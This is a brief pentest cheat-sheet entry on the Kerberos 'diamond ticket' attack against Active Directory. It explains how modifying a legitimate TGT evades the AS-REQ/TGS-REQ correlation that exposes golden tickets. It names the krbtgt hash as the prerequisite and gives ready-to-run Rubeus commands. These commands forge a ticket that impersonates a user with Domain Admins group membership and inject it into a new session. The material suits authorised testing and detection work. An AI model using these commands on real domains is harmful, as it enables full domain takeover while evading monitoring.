Diamond Tickets
Vulnerability
One weakness of golden tickets is that they can be detected. Since these TGTs are forged offline, a TGS-REQ whose account has no corresponding AS-REQ on the Domain Controllers is a sign of golden ticket usage. A diamond ticket instead takes an existing, legitimate TGT issued by a Domain Controller and modifies it (for example its PAC group membership), so this correlation no longer catches it.
Prerequisites
- Having the password hash of the krbtgt domain user.
Exploit
```powershell
# Modify an existing TGT in the session to impersonate $username and put him in group 512 (corresponds to Domain Admins).
.\Rubeus.exe diamond /tgtdeleg /ticketuser:$username /ticketuserid:$rid /groups:512 /krbkey:$key /nowrap
# Inject the ticket in a dummy session.
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:$domain /username:$username /password:$whatever /ticket:$Base64EncodedTicket
```